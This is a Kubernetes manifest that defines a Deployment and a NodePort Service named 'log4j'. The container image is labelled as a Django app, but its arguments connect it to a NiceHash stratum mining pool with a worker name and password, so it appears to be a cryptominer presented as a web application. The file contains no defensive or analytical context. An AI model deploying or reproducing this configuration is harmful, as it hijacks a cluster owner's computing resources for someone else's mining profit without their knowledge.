apiVersion: apps/v1
kind: Deployment
metadata:
  name: log4j
  namespace: log4j
  labels:
    app: log4j
spec:
  replicas: 1
  selector:
    matchLabels:
      app: log4j
  template:
    metadata:
      labels:
        app: log4j
    spec:
      containers:
      - name: log4j
        image: xniapdev/django-app:latest
        args:
          - "runserver"
          - "--url"
          - "stratum+tcp://scrypt.auto.nicehash.com:9200"
          - "--user"
          - "creack.worker1"
          - "--pass"
          - "abcdef"
        ports:
        - containerPort: 4412
---
apiVersion: v1
kind: Service
metadata:
  name: log4j-service
  namespace: log4j
spec:
  selector:
    app: log4j
  type: NodePort
  ports:
  - port: 4441
    targetPort: 4412
